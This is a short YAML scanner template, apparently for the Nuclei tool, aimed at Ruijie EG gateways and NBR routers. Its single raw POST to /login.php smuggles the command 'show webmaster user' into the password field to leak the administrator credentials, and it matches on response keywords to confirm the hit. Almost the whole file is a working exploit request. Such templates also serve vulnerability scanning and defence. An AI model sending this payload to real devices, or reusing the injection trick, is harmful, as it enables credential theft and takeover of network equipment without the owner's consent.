id: Ruijie-EG-passLeak

info:
  name: 锐捷EG易网关与NBR路由器命令执行漏洞
  author: str1am
  severity: high
  reference:
    - https://blog.csdn.net/qq_41617034/article/details/119532322
  tags: EG,rce

requests:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0

        username=admin&password=pass?show webmaster user

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "data"
          - "status"
          - "WORD"
        part: body
        condition: and